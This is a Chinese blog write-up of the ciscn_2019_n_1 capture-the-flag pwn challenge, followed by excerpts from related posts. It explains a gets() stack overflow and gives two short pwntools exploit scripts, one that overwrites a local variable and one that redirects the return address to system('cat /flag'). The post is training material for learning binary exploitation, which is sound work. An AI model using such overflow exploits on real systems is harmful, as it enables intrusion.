ciscn_2019_n_1 ——两种解法

已于 2022-07-13 13:46:26 修改
阅读量2.8k 收藏 7
点赞数 2
分类专栏: CTF训练 PWN 文章标签: PWN linux
于 2022-07-13 13:46:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/125761739
版权
CTF训练 同时被 2 个专栏收录
46 篇文章 15 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏
本文解析了一道CISCN_2019_n_1竞赛题目,涉及地址覆盖和利用system函数绕过漏洞的方法。讲解了如何利用溢出覆盖变量v2的值并执行system('cat/flag')。关键步骤包括确定溢出长度和构造payload。
摘要由CSDN通过智能技术生成

ciscn_2019_n_1

题目分析

在这里插入图片描述
64位程序,栈不可执行,地址没有随机化
查看函数逻辑
在这里插入图片描述
在这里插入图片描述
main函数调用了func(),func中存在经典gets()漏洞,这题逻辑就是输入v1,但判断v2的值是否是11.28125

方法一:地址覆盖

既然题目判断v2的值,那么我们将v2的值覆盖成11.28125即可,首先我们要找到11.28125的16进制表达形式,因为我们构造payload的时不能传入一个float类型
可以直接使用ida查看
在这里插入图片描述
11.28125 = 0x41348000
那么只剩下该溢出多少这一个问题了
在这里插入图片描述
即溢出距离:0x30-0x4
exp1

from pwn import *
io = process("./ciscn_2019_n_1")
payload = b'A'*(0x30-0x4) + p64(0x41348000)
io.send(payload)
io.interactive()

方法2:利用system(“cat /flag”)

在这里插入图片描述
在这里插入图片描述
我们可以直接跳过判断,直接通过栈溢出让函数返回执行system(“cat /flag”)
在这里插入图片描述
因此我们构造的payload = 垃圾数据*(0x60-0x30+8) + addr_system(“cat /flag”)
exp2

from pwn import *
context.arch = 'amd64'
io = process("./ciscn_2019_n_1")
sys_addr = 0x4006BE
payload = b'A'*(0x30+8) + p64(sys_addr)
io.send(payload)
io.interactive()
Mokapeng
关注
专栏目录
pwn——ciscn_2019_n_1#pwn1_sctf_2016#jarvisoj_level0
LSYZWF的博客
10-26 607
文章目录ciscn_2019_n_1题目解答 ciscn_2019_n_1 题目 题目链接:https://buuoj.cn/challenges#ciscn_2019_n_1 解答 1、打开IDA进行分析 发现函数gets和系统命令cat 此函数的大致意思是输入v1的值,然后判断v2,故存在栈溢出使得v2的内存中的值为11.28125 2、判断偏移地址 v2的内存地址距离v1首地址的偏移量是30h-04h=2ch 3、gdb调试一波 没有堆栈溢出保护 4、编写脚本 11.28125的十六进制可以在I
pwnciscn_2019_s_3
Nothing
12-14 4596
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
2021_09_15_ciscn_2019_n_1
m0_51187558的博客
09-15 2857
ciscn_2019_n_1 前言 每日一题pwn方向的第二题。也是初入漏洞利用的一道特别基础的题。 大家都应该尝试着做过了上一道,也就是test your nc。从解法来说其实那道题的难度真的只是半脚踩在入门的门坎上。就像wp中所说的那样,目前pwn题的核心是通过漏洞挖掘与利用来提权,而nc这道题可以说是不需要任何漏洞的挖掘与利用,做出这道题并不代表你已经入门pwn了。 虽然如此,从ciscn_2019_n_1这道题开始,我们真正要开始尝试迈过pwn题的那一道门槛,面对一些简单的漏洞进行利用了。 做题流程
ciscn_2019_n_1
weixin_52034946的博客
01-15 458
检查,64位 ida查看 又是gets函数,思路来了,一直输入挤满栈,直到v2处输入11.28125 11.28125的16进制转换是 0x41348000h 脚本 from pwn import* r = remote(“node3.buuoj.cn”,29950) flag_addr = 0x41348000 payload = “a”*(0x30-0x4)+p64(flag_addr) r.sendline(payload) r.interactive() 0x30 - 0x4 就是v1到v2处的空
[BUUCTF]PWN------ciscn_2019_n_1
BangSen1的博客
01-16 286
ciscn_2019_n_1 例行检查,64bit,NX保护开启 运行一下,没有信息 64位IDA打开,看到了cat flag ,跟进瞧瞧 函数显示 ,当v2等于11.28125时,得到flag,但要求 我们输入的是v1,所以我们只有把v1和v2 之间全部填满之后紧接着写入11.28125即可。 我们可以看到这两个之间的大小为0x2C 再将11.28125转换为内存中的16进制,结果为 0x41348000 摘自 exp 得到FLAG ...
ciscn_2021_lonelywolf.zip
05-17
【标题解析】:“ciscn_2021_lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛...
用c语言求1 n的素数个数 给出两种解法,【题目】求n以内的素数个数
weixin_42500739的博客
05-23 7468
最近在leetCode上刷提,还是满锻炼人的,为以后面试打基础吧。不多说下面开始。问题:求[2,n]之间的素数的个数。来源:leetCode OJ提示:Let's start with aisPrimefunction. To determine if a number is prime, we need to check if it is not divisible by any numbe...
小波分析的应用——语音降噪.rar_小波 语音_小波语音降噪_时频分析_语音时频分析_语音降噪
07-14
小波分析作为时频分析的高阶解法,被广泛应用于语音降噪
信号与系统微分方程3种解法——含冲激函数匹配法
04-09
### 信号与系统微分方程3种解法——含冲激函数匹配法 #### 一、概述 本文旨在深入探讨信号与系统中常见的微分方程及其三种解法,特别是涉及冲激函数的匹配方法。通过对具体例题的解析,帮助读者更好地理解这些解法...
BUU ciscn_2019_n_1
xieyichensss的博客
03-19 403
**BUUOJ ciscn_2019_n_1** (今天来晚了,嘿嘿,出去唱歌了,被淋成落汤鸡) 1.老规矩,将其checksec和file一下,发现NX保护被打开了,且是64为的ELF文件。 2.那就放入IDA64内分析,按fn+F5查看c的代码,发现一个func()的函数,双击进入 cat flag直接映入眼帘,我tm直接暗喜,有后门函数了诶,那就不慌了,直接看c的代码。 3.要想将后门函数覆盖到返回地址,那就必须要v2=11.28125,可是又没有v2的gets函数,我们...
BUUCTF—ciscn_2019_n_1 1
qq_41560595的博客
09-24 4424
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
[每日一PWN]BUUCTF ciscn_2019_n_1
qq_55233040的博客
11-21 565
这道题双解,一种ret2text,另一种就是单纯的覆盖数据改变判断结果。
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 1059
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 题目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA中看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
以题目:ciscn_2019_n_1来详细学习dbg和pwntools
最新发布
WdIg-2023的博客
01-21 1186
我们在做Linux平台下的pwn题目的时候,调试是必不可少的一步,在调试的过程中找到漏洞并用pwntools写出攻击脚本。
PWN学习记录(4)BUUCTF-ciscn_2019_n_1
m0_58824086的博客
08-05 181
下载题目得到ciscn_2019_n_1,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将文件放入IDA中查看,打开字符串窗口。没有发现 /bin/sh,但找到了cat flag.txt。打开终端,输入vim 1.py 创建一个python文件(命名随意)NX enabled如果这个保护开启就是意味着栈中数据没有执行权限。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。双击cat flag.text。打开main,F5反编译。
BUU CTF PWN ciscn_2019_n_1 WriteUp
m0sway的博客
02-28 263
BUU CTF PWNciscn_2019_n_1的WriteUp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值